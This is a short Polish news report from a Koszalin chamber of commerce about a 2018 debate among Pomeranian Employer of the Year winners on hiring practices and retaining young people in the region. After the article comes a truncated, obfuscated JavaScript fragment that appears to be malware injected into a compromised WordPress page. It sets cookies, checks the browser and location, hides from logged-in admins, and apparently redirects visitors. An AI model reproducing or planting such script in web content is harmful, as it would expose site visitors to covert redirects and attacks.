Relacja debata „Dobre praktyki – Pracodawcy Roku Pomorza 2018” | Północna Izba Gospodarcza w Koszalinie

W dniu 21 marca br. o godzinie 13.30 odbyła się debata pt. „Dobre praktyki – Pracodawcy Roku Pomorza 2018”, w której udział wzięli zwycięzcy i laureaci dwóch edycji Konkursu Pracodawca Roku Pomorza.

Dziękujemy uczestnikom za wkład i przedstawieni swoje perspektywy:

GlobalLogic –  Piotr Bartkiewicz  – Pracodawca Roku Pomorza 2018
Gawex Media –  Monika Dołębska  – Pracodawca Roku Pomorza 2017 
SBC Windows & Doors  Adam Pankowski  – Pracodawca Roku Pomorza 2018
MPS International –  Wioleta Iwanek – wyróżnienie
Kospel – Łukasz Zejfert – wyróżnienie
Prezes Północnej Izby Gospodarczej w Koszalinie –  Roman Biłas

Dziękujemy Panu doktorowi Adamowi Wyszomirskiemu za zaangażowanie i moderowanie dyskusji.

Spotkanie kontynuuje działania Północnej Izby Gospodarczej w Koszalinie w kwestii podwyższania atrakcyjności regionu jako miejsca sprzyjającego rozwoju biznesu oraz budowania dobrych praktyk w zatrudnianiu pracowników. Omówiono także perspektywy działań i współpracy z samorządem, aby zapobiegać odpływowi kadr i młodzieży z regionu, a przede wszystkim zachęceniu do powrotu po uzyskaniu wykształcenia.

Już wkrótce przedstawimy Państwu wnioski płynące z dzisiejszego spotkania.

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m